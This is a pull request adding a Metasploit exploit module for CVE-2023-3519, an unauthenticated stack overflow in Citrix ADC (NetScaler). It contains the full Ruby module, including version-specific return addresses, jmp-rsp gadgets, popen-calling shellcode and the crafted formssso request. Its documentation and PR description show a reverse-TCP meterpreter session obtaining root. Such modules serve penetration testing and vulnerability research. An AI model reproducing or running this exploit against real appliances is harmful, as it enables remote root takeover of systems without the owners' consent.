### PR TITLE
Add CVE-2023-3519 Citrix RCE

### DIFF
--- a/documentation/modules/exploit/freebsd/http/citrix_formssso_target_rce.md
+++ b/documentation/modules/exploit/freebsd/http/citrix_formssso_target_rce.md
@@ -1,0 +1,74 @@
+## Vulnerable Application
+
+A vulnerability exists within Citrix ADC that allows an unauthenticated attacker to trigger a stack buffer overflow of
+the nsppe process by making a specially crafted HTTP GET request. Successful exploitation results in remote code
+execution as root.
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/freebsd/http/citrix/formssso_target_Rce`
+4. Set the `RHOST`, `PAYLOAD` and payload-related options
+5. Do: `run`
+6. You should get a shell.
+
+## Options
+
+## Scenarios
+Specific demo of using the module that might be useful in a real world scenario.
+
+### Citrix ADC 13.1-48.47
+
+NetScalar VPX instance for VMware ESX from `NSVPX-ESX-13.1-48.47_nc_64`.
+
+```
+msf6 exploit(freebsd/http/citrix_formssso_target_rce) > show options 
+
+Module options (exploit/freebsd/http/citrix_formssso_target_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.159.130  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      443              yes       The target port (TCP)
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       Base path
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/unix/python/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Citrix ADC 13.1-48.47
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(freebsd/http/citrix_formssso_target_rce) > run
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] Sending stage (24768 bytes) to 192.168.159.30
+[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.30:36429) at 2023-07-31 17:34:18 -0400
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : cirtrix
+OS           : FreeBSD 11.4-NETSCALER-13.1 FreeBSD 11.4-NETSCALER-13.1 #0 2596b10c4(rs_131_48_41_RTM): Sat Jun  3 00:57:48 PDT 2023     root@sjc-bld-bsd114-232:/usr/obj/usr/home/build/adc/usr.src/sys/NS64
+Architecture : x64
+Meterpreter  : python/freebsd
+meterpreter > pwd
+/
+meterpreter > 
+```

--- a/documentation/modules/exploit/freebsd/http/citrix_formssso_target_rce.md
+++ b/documentation/modules/exploit/freebsd/http/citrix_formssso_target_rce.md
@@ -20,7 +20,7 @@ Specific demo of using the module that might be useful in a real world scenario.
 
 ### Citrix ADC 13.1-48.47
 
-NetScalar VPX instance for VMware ESX from `NSVPX-ESX-13.1-48.47_nc_64`.
+NetScaler VPX instance for VMware ESX from `NSVPX-ESX-13.1-48.47_nc_64`.
 
 ```
 msf6 exploit(freebsd/http/citrix_formssso_target_rce) > show options 

--- a/modules/exploits/freebsd/http/citrix_formssso_target_rce.rb
+++ b/modules/exploits/freebsd/http/citrix_formssso_target_rce.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   Rank = NormalRanking
 
+  prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
@@ -67,6 +68,18 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options([
       OptString.new('TARGETURI', [true, 'Base path', '/'])
     ])
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'], 'logon', 'LogonPoint', 'index.html')
+    })
+
+    return CheckCode::Unknown if res.nil?
+
+    return CheckCode::Safe unless res.code == 200 && res.body =~ /<title class="_ctxstxt_NetscalerGateway">/
+
+    CheckCode::Detected
   end
 
   def exploit

--- a/modules/exploits/freebsd/http/citrix_formssso_target_rce.rb
+++ b/modules/exploits/freebsd/http/citrix_formssso_target_rce.rb
@@ -46,7 +46,20 @@ class MetasploitModule < Msf::Exploit::Remote
               'fixup_return' => 0x00782403, # ns_aaa_cookie_valid
               'fixup_stack_adjustment' => 0x13a8,
               'popen' => 0x01da6340,
-              'return' => 0x7fffffffc1e0,
+              'return' => 0x7fff_ffffc1e0,
+              'return_offset' => 168
+            },
+          ],
+          [
+            'Citrix ADC 13.0-91.12',
+            {
+              'fixup_return' => 0x008530a2, # ns_aaa_cookie_valid
+              'fixup_stack_adjustment' => 0x12e0,
+              # in this version the epilogue of ns_aaa_cookie_valid reads directly from rbp and since the exploit
+              # clobbers it, the value needs to be restored and can't be done using relative adjustment like rsp
+              'fixup_rbp' => 0x7fff_fffe3a40,
+              'popen' => 0x01f42ec0,
+              'return' => 0x7fff_fffe25d0,
               'return_offset' => 168
             }
           ]
@@ -83,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    shellcode = Metasm::Shellcode.assemble(Metasm::X64.new, <<-SHELLCODE).encode_string
+    shellcode = Metasm::Shellcode.assemble(Metasm::X64.new, Template.render(<<-SHELLCODE, target: target)).encode_string
       call loc_popen_arg1
         ; add this to the path for python payloads
         db "export PATH=/var/python/bin:$PATH;"
@@ -96,19 +109,22 @@ class MetasploitModule < Msf::Exploit::Remote
       loc_popen_arg2:
         pop rsi
 
-        mov  rax, #{target['popen']}
+        mov  rax, <%= target['popen'] %>
         sub  rsp, 0x200
         call rax
 
       loc_return:
         xor rax, rax
-        add rsp, #{target['fixup_stack_adjustment'] + 0x200}
-        push     #{target['fixup_return']}
+        <% if target['fixup_rbp'] %>
+        mov rbp, <%= target['fixup_rbp'] %>
+        <% end %>
+        add rsp, <%= target['fixup_stack_adjustment'] + 0x200 %>
+        push     <%= target['fixup_return'] %>
         ret
     SHELLCODE
 
     buffer = rand_text_alphanumeric(target['return_offset']).bytes.map { |b| (b < 0xa0) ? '%%%02x' % b : b.chr }.join
-    buffer << [target['return']].pack('Q')
+    buffer << [target['return']].pack('Q').bytes.map { |b| (b == 25) ? '%%%02x' % b : b.chr }.join
     buffer << shellcode.bytes.map { |b| (b < 0xa0) ? '%%%02x' % b : b.chr }.join
 
     send_request_cgi({
@@ -119,5 +135,22 @@ class MetasploitModule < Msf::Exploit::Remote
         'target' => buffer
       }
     })
+  end
+
+  class Template
+    def self.render(template, context = nil)
+      case context
+      when Hash
+        b = binding
+        locals = context.collect { |k, _| "#{k} = context[#{k.inspect}]; " }
+        b.eval(locals.join)
+      when NilClass
+        b = binding
+      else
+        raise ArgumentError
+      end
+
+      b.eval(Erubi::Engine.new(template).src)
+    end
   end
 end

--- a/modules/exploits/freebsd/http/citrix_formssso_target_rce.rb
+++ b/modules/exploits/freebsd/http/citrix_formssso_target_rce.rb
@@ -134,9 +134,9 @@ class MetasploitModule < Msf::Exploit::Remote
         ret
     SHELLCODE
 
-    buffer = rand_text_alphanumeric(target['return_offset']).bytes.map { |b| (b < 0xa0) ? '%%%02x' % b : b.chr }.join
-    buffer << [target['return']].pack('Q').bytes.map { |b| (b == 25) ? '%%%02x' % b : b.chr }.join
-    buffer << make_nops(4) + shellcode.bytes.map { |b| (b < 0xa0) ? '%%%02x' % b : b.chr }.join
+    buffer = rand_text_alphanumeric(target['return_offset'])
+    buffer << [target['return']].pack('Q')
+    buffer << shellcode.bytes.map { |b| (b < 0xa0) ? '%%%02x' % b : b.chr }.join
 
     send_request_cgi({
       'uri' => normalize_uri(datastore['TARGETURI'], 'gwtest', 'formssso'),

--- a/modules/exploits/freebsd/http/citrix_formssso_target_rce.rb
+++ b/modules/exploits/freebsd/http/citrix_formssso_target_rce.rb
@@ -33,6 +33,11 @@ class MetasploitModule < Msf::Exploit::Remote
         'License' => MSF_LICENSE,
         'Platform' => ['unix'],
         'Arch' => [ARCH_CMD],
+        'Payload' => {
+          # at a certain point too much of the stack will get corrupted, should be less than target['fixup_stack_adjustment']
+          'Space' => 2048,
+          'DisableNops' => true
+        },
         'Targets' => [
           [
             'Citrix ADC 13.1-48.47',
@@ -81,11 +86,10 @@ class MetasploitModule < Msf::Exploit::Remote
         mov  rax, #{target['popen']}
         sub  rsp, 0x200
         call rax
-        add  rsp, 0x200
 
       loc_return:
         xor rax, rax
-        add rsp, #{target['fixup_stack_adjustment']}
+        add rsp, #{target['fixup_stack_adjustment'] + 0x200}
         push     #{target['fixup_return']}
         ret
     SHELLCODE

--- a/modules/exploits/freebsd/http/citrix_formssso_target_rce.rb
+++ b/modules/exploits/freebsd/http/citrix_formssso_target_rce.rb
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Platform' => ['unix'],
         'Arch' => [ARCH_CMD],
         'Payload' => {
-          # at a certain point too much of the stack will get corrupted, should be less than target['fixup_stack_adjustment']
+          # at a certain point too much of the stack will get corrupted, should be less than target['fixup_rsp_adjustment']
           'Space' => 2048,
           'DisableNops' => true
         },
@@ -43,33 +43,33 @@ class MetasploitModule < Msf::Exploit::Remote
           [
             'Citrix ADC 13.1-48.47',
             {
-              'fixup_return' => 0x00782403, # ns_aaa_cookie_valid
-              'fixup_stack_adjustment' => 0x13a8,
+              'fixup_return' => 0x00782403, # pop rbx; ns_aaa_cookie_valid
+              'fixup_rsp_adjustment' => 0x13a8,
               'popen' => 0x01da6340,
-              'return' => 0x7fff_ffffc1e0,
+              'return' => 0x00611ae9, # jmp rsp; ns_create_cfg_nsp
               'return_offset' => 168
             },
           ],
           [
             'Citrix ADC 13.1-37.38',
             {
-              'fixup_return' => 0x0077c324, # ns_aaa_cookie_valid
-              'fixup_stack_adjustment' => 0x13a8,
+              'fixup_return' => 0x0077c324, # pop rbx; ns_aaa_cookie_valid
+              'fixup_rsp_adjustment' => 0x13a8,
               'popen' => 0x01d7e320,
-              'return' => 0x7fff_ffffc121,
+              'return' => 0x015d131d, # jmp rsp; tfocookie_send_callback
               'return_offset' => 168
             },
           ],
           [
             'Citrix ADC 13.0-91.12',
             {
-              'fixup_return' => 0x008530a2, # ns_aaa_cookie_valid
-              'fixup_stack_adjustment' => 0x12e0,
+              'fixup_return' => 0x008530a2, # mov rbx, qword [rbp-0x28]; ns_aaa_cookie_valid
+              'fixup_rsp_adjustment' => 0x12e0,
               # in this version the epilogue of ns_aaa_cookie_valid reads directly from rbp and since the exploit
-              # clobbers it, the value needs to be restored and can't be done using relative adjustment like rsp
-              'fixup_rbp' => 0x7fff_fffe3a40,
+              # clobbers it, the value needs to be restored
+              'fixup_rbp_adjustment' => 0x190,
               'popen' => 0x01f42ec0,
-              'return' => 0x7fff_fffe25d0,
+              'return' => 0x024883bf, # jmp rsp; ns_pixl_eval_nvlist_t_typecast_list_t_dynamic
               'return_offset' => 168
             }
           ]
@@ -125,10 +125,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
       loc_return:
         xor rax, rax
-        <% if target['fixup_rbp'] %>
-        mov rbp, <%= target['fixup_rbp'] %>
+        add rsp, <%= target['fixup_rsp_adjustment'] + 0x200 %>
+        <% if target['fixup_rbp_adjustment'] %>
+        mov rbp, rsp
+        add rbp, <%= target['fixup_rbp_adjustment'] %>
         <% end %>
-        add rsp, <%= target['fixup_stack_adjustment'] + 0x200 %>
         push     <%= target['fixup_return'] %>
         ret
     SHELLCODE

--- a/modules/exploits/freebsd/http/citrix_formssso_target_rce.rb
+++ b/modules/exploits/freebsd/http/citrix_formssso_target_rce.rb
@@ -51,6 +51,16 @@ class MetasploitModule < Msf::Exploit::Remote
             },
           ],
           [
+            'Citrix ADC 13.1-37.38',
+            {
+              'fixup_return' => 0x0077c324, # ns_aaa_cookie_valid
+              'fixup_stack_adjustment' => 0x13a8,
+              'popen' => 0x01d7e320,
+              'return' => 0x7fff_ffffc121,
+              'return_offset' => 168
+            },
+          ],
+          [
             'Citrix ADC 13.0-91.12',
             {
               'fixup_return' => 0x008530a2, # ns_aaa_cookie_valid
@@ -125,7 +135,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     buffer = rand_text_alphanumeric(target['return_offset']).bytes.map { |b| (b < 0xa0) ? '%%%02x' % b : b.chr }.join
     buffer << [target['return']].pack('Q').bytes.map { |b| (b == 25) ? '%%%02x' % b : b.chr }.join
-    buffer << shellcode.bytes.map { |b| (b < 0xa0) ? '%%%02x' % b : b.chr }.join
+    buffer << make_nops(4) + shellcode.bytes.map { |b| (b < 0xa0) ? '%%%02x' % b : b.chr }.join
 
     send_request_cgi({
       'uri' => normalize_uri(datastore['TARGETURI'], 'gwtest', 'formssso'),

--- a/modules/exploits/freebsd/http/citrix_formssso_target_rce.rb
+++ b/modules/exploits/freebsd/http/citrix_formssso_target_rce.rb
@@ -1,0 +1,106 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Citrix ADC (NetScaler) Forms SSO Target RCE',
+        'Description' => %q{
+          A vulnerability exists within Citrix ADC that allows an unauthenticated attacker to trigger a stack buffer
+          overflow of the nsppe process by making a specially crafted HTTP GET request. Successful exploitation results in
+          remote code execution as root.
+        },
+        'Author' => [
+          'Ron Bowes', # Analysis and module
+          'Douglass McKee', # Analysis and module
+          'Spencer McIntyre', # Just the module
+        ],
+        'References' => [
+          ['CVE', '2023-3519'],
+          ['URL', 'https://attackerkb.com/topics/si09VNJhHh/cve-2023-3519'],
+          ['URL', 'https://support.citrix.com/article/CTX561482/citrix-adc-and-citrix-gateway-security-bulletin-for-cve20233519-cve20233466-cve20233467']
+        ],
+        'DisclosureDate' => '2023-07-18',
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix'],
+        'Arch' => [ARCH_CMD],
+        'Targets' => [
+          [
+            'Citrix ADC 13.1-48.47',
+            {
+              'fixup_return' => 0x00782403, # ns_aaa_cookie_valid
+              'fixup_stack_adjustment' => 0x13a8,
+              'popen' => 0x01da6340,
+              'return' => 0x7fffffffc1e0,
+              'return_offset' => 168
+            }
+          ]
+        ],
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true,
+          'WfsDelay' => 10
+        },
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  def exploit
+    shellcode = Metasm::Shellcode.assemble(Metasm::X64.new, <<-SHELLCODE).encode_string
+      call loc_popen_arg1
+        ; add this to the path for python payloads
+        db "export PATH=/var/python/bin:$PATH;"
+        db "#{Rex::Text.to_hex(payload.encoded)}", 0
+      loc_popen_arg1:
+        pop  rdi
+
+      call loc_popen_arg2
+        db "r", 0
+      loc_popen_arg2:
+        pop rsi
+
+        mov  rax, #{target['popen']}
+        sub  rsp, 0x200
+        call rax
+        add  rsp, 0x200
+
+      loc_return:
+        xor rax, rax
+        add rsp, #{target['fixup_stack_adjustment']}
+        push     #{target['fixup_return']}
+        ret
+    SHELLCODE
+
+    buffer = rand_text_alphanumeric(target['return_offset']).bytes.map { |b| (b < 0xa0) ? '%%%02x' % b : b.chr }.join
+    buffer << [target['return']].pack('Q')
+    buffer << shellcode.bytes.map { |b| (b < 0xa0) ? '%%%02x' % b : b.chr }.join
+
+    send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'], 'gwtest', 'formssso'),
+      'encode_params' => false,  # we'll encode them ourselves
+      'vars_get' => {
+        'event' => 'start',
+        'target' => buffer
+      }
+    })
+  end
+end


### PR DESCRIPTION
The exploit works on 13.1-48.47 but I still need to write the docs and look into a check method. I tested both the `cmd/unix/reverse_bash` and `cmd/unix/python/meterpreter/reverse_tcp` payloads. The `nsppe` process does not crash so the target can be exploited repeatedly. It's highly unlikely that the addresses and offsets will work on other Citrix targets. I'll need to review those and add them as necessary.

## Verification

- [ ] Setup a vulnerable version of Citrix ADC
- [ ] Use the module
- [ ] Set the `RHOST`, `PAYLOAD` and payload-related datastore options
- [ ] Run the exploit and see the payload has executed

## Example

```
msf6 exploit(freebsd/http/citrix_formssso_target_rce) > show options 

Module options (exploit/freebsd/http/citrix_formssso_target_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.159.130  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Citrix ADC 13.1-48.47



View the full module info with the info, or info -d command.

msf6 exploit(freebsd/http/citrix_formssso_target_rce) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Sending stage (24768 bytes) to 192.168.159.30
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.30:36429) at 2023-07-31 17:34:18 -0400

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : cirtrix
OS           : FreeBSD 11.4-NETSCALER-13.1 FreeBSD 11.4-NETSCALER-13.1 #0 2596b10c4(rs_131_48_41_RTM): Sat Jun  3 00:57:48 PDT 2023     root@sjc-bld-bsd114-232:/usr/obj/usr/home/build/adc/usr.src/sys/NS64
Architecture : x64
Meterpreter  : python/freebsd
meterpreter > pwd
/
meterpreter > 
```